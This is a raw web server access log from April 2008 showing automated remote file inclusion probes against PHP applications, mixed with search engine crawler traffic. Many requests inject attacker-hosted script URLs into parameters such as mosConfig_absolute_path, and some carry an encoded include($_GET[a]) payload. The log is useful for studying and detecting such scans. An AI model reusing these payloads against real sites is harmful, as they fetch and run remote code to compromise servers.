204.11.238.233 - - [07/Apr/2008:10:00:21 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:00:23 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:00:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:10:00:44 -0700] "GET /logs/access_080223.log//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:10:00:46 -0700] "GET //?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:10:00:47 -0700] "GET /logs//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 200 42127 "-" "libwww-perl/5.805" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:10:01:01 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:10:01:03 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:10:01:03 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:01:34 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:01:34 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [07/Apr/2008:10:01:50 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.193.106 - - [07/Apr/2008:10:02:22 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://200.220.215.214/~teste/xpl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.193.106 - - [07/Apr/2008:10:02:23 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://200.220.215.214/~teste/xpl/on.txt?????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.193.106 - - [07/Apr/2008:10:02:24 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://200.220.215.214/~teste/xpl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:10:02:44 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:10:02:44 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:10:03:00 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:10:03:04 -0700] "GET //sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:10:03:07 -0700] "GET /logs//sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:10:03:23 -0700] "GET /logs/access_080329.log/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:10:03:49 -0700] "GET /logs/access_080324.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:03:49 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 1893701 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:10:03:50 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:10:03:50 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [07/Apr/2008:10:03:54 -0700] "GET /logs/access_080312.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:10:04:00 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.177.56.40 - - [07/Apr/2008:10:04:08 -0700] "GET //modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:10:04:22 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:04:26 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
129.241.104.189 - - [07/Apr/2008:10:04:37 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "boitho.com-dc/0.85 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:10:04:42 -0700] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [07/Apr/2008:10:04:42 -0700] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:04:51 -0700] "GET /admin/index.php?o=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:10:05:15 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:05:23 -0700] "GET /logs/access_080313.log//?pg=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:05:23 -0700] "GET /logs/access_080313.log//?pg=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:05:24 -0700] "GET /logs/access_071026.log HTTP/1.0" 200 67672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:05:26 -0700] "GET /logs/access_071024.log HTTP/1.0" 200 11603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.133.62 - - [07/Apr/2008:10:05:38 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.117.113 - - [07/Apr/2008:10:05:40 -0700] "GET /config.php?path_to_root=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.36.172.113 - - [07/Apr/2008:10:05:51 -0700] "GET /logs/access_080313.loghttp://spartanteam.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0)" "www.dmulk.com"
74.6.21.90 - - [07/Apr/2008:10:07:15 -0700] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.90 - - [07/Apr/2008:10:07:20 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.52.51 - - [07/Apr/2008:10:07:48 -0700] "GET /bikes/dteel/2008_01_27/?M=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:10:08:37 -0700] "GET //administrator/?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:10:08:37 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:10:09:51 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.56.55.6 - - [07/Apr/2008:10:10:01 -0700] "GET /logs/access_080329.log/index.php?option=com_ponygallery&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.55.6 - - [07/Apr/2008:10:10:04 -0700] "GET /index.php?option=com_ponygallery&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.55.6 - - [07/Apr/2008:10:10:05 -0700] "GET /logs/index.php?option=com_ponygallery&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:10:15 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:10:15 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:10:10:15 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:10:10:18 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.147.120 - - [07/Apr/2008:10:10:18 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.133.62 - - [07/Apr/2008:10:10:58 -0700] "GET /logs/access_080329.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [07/Apr/2008:10:10:58 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:20 -0700] "GET /logs/access_080128.log//photoalb/lib/static/header.php?set_menu=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:20 -0700] "GET /logs/access_080128.log//photoalb/lib/static/header.php?set_menu=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:21 -0700] "GET //photoalb/lib/static/header.php?set_menu=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:21 -0700] "GET //photoalb/lib/static/header.php?set_menu=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:21 -0700] "GET /logs//photoalb/lib/static/header.php?set_menu=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:11:21 -0700] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:22 -0700] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:11:28 -0700] "GET /plans/ HTTP/1.1" 200 1111 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.19.193.106 - - [07/Apr/2008:10:11:37 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://200.220.215.214/~teste/xpl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:56 -0700] "GET /logs/access_080312.log//photoalb/lib/static/header.php?set_menu=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:10:11:56 -0700] "GET /logs/access_080312.log//photoalb/lib/static/header.php?set_menu=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:10:12:08 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:10:12:11 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:10:12:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:12:22 -0700] "GET /logs/access_080226.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:12:23 -0700] "GET /backup2/ HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:12:26 -0700] "GET /tools/ HTTP/1.1" 200 12404 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:12:29 -0700] "GET /?N=D HTTP/1.1" 200 7371 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:13:00 -0700] "GET /logs/access_071123.log HTTP/1.0" 200 53071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:13:00 -0700] "GET /logs/access_070916.log HTTP/1.0" 200 144658 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:13:14 -0700] "GET /logs/access_080329.log HTTP/1.0" 200 1714642 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:13:17 -0700] "GET /logs/access_080324.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:13:19 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:13:20 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:20 -0700] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:21 -0700] "GET /tmp/ HTTP/1.1" 200 1166 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:21 -0700] "GET /bikes/ HTTP/1.1" 200 2320 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:24 -0700] "GET /drop/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:24 -0700] "GET /backup/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.146.251.123 - - [07/Apr/2008:10:13:26 -0700] "GET /logs/access_080312.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:27 -0700] "GET /warboard/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:28 -0700] "GET /_private/ HTTP/1.1" 403 163 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:10:13:28 -0700] "GET /mobilehackers/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:14:00 -0700] "GET /logs/access_080201.log//claroline/auth/ldap/authldap.php?includePath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:14:00 -0700] "GET //claroline/auth/ldap/authldap.php?includePath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:14:00 -0700] "GET /logs//claroline/auth/ldap/authldap.php?includePath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:10:14:36 -0700] "GET /logs/access_080216.log/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:10:14:36 -0700] "GET /main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:10:14:36 -0700] "GET /logs/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:10:14:57 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:10:14:59 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 7355 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:10:15:22 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:10:15:22 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:15:28 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:15:29 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:15:29 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:15:44 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:10:15:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.162.215.10 - - [07/Apr/2008:10:17:05 -0700] "GET /logs/access_080130.log//?mosConfig_absolute_path=http://gtaxweb.helloweb.eu/html/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [07/Apr/2008:10:17:07 -0700] "GET //?mosConfig_absolute_path=http://gtaxweb.helloweb.eu/html/cmd.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [07/Apr/2008:10:17:16 -0700] "GET /logs//?mosConfig_absolute_path=http://gtaxweb.helloweb.eu/html/cmd.txt? HTTP/1.1" 200 42127 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:10:17:18 -0700] "GET /index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:17:34 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
